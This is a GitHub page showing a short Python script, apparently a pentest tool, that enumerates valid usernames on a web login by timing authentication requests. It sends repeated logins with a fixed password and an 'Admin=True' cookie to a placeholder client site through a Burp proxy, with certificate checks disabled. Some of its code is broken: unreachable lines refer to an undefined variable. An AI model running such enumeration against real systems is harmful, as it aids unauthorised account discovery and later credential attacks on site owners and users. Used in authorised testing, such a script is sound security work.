-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathenum-web-users.py
More file actions
executable file
·91 lines (69 loc) · 2.6 KB
/
enum-web-users.py
File metadata and controls
executable file
·91 lines (69 loc) · 2.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#!/usr/bin/env python3
# import logging
import re
import requests
# logging.basicConfig(
# # filename='example.log',
# level=logging.INFO,
# format='(%(threadName)-10s)-%(levelname)s: %(message)s',
# )
def print_error(msg):
print("\033[1m\033[31m[-]\033[0m {0}".format(msg))
def print_status(msg):
print("\033[1m\033[34m[*]\033[0m {0}".format(msg))
def print_good(msg):
print("\033[1m\033[32m[+]\033[0m {0}".format(msg))
def print_warn(msg):
print("\033[1m\033[33m[!]\033[0m {0}".format(msg))
def test_username(username):
''' Take a username as argument and return the response time to be compared.'''
burp = {
'http': 'http://localhost:8080/',
'https': 'http://localhost:8080/',
}
s = requests.Session()
s.proxies = burp
site = 'https://www.client.com/'
userAgent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3569.0 Safari/537.36 autochrome/grey'
# Get StateContext
urlState = site + 'admin/login.aspx'
headers = {
'User-Agent': userAgent
}
reply = s.post(urlState, data={}, verify=False, headers=headers)
stateContext = re.compile('<StateContext>([^<]*)</StateContext>').search(reply.text).group(1)
# Test authentication
urlAuth = site + 'p/u/doAuthentication.do'
headers = {
'User-Agent': userAgent,
'Accept': 'application/xml, text/xml, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3569.0 Safari/537.36 autochrome/grey',
'Referer': 'https://www.client.com/admin/',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7',
'Cookie': 'Admin=True',
}
dataAuth = {
'login': username,
'passwd': 'Pa$$w0rd',
'savecredentials': 'false',
'StateContext': stateContext
}
reply = s.post(urlAuth, data=dataAuth, verify=False, headers=headers)
return reply.elapsed.total_seconds()
print(res)
if re.search('An account registered to this email address already exists.', res):
print('{} is an already registered account.'.format(username))
else:
print('{} does not exist.'.format(username))
return 8
def main():
nbTests = 100
for user in ['testsecu', 'testsecur', 'testsecuri']:
t = 0
for i in range(nbTests):
t += test_username(user)
print('{} tests of "{}" took {} seconds in average.'.format(nbTests, user, t/nbTests))
if __name__ == '__main__':
main()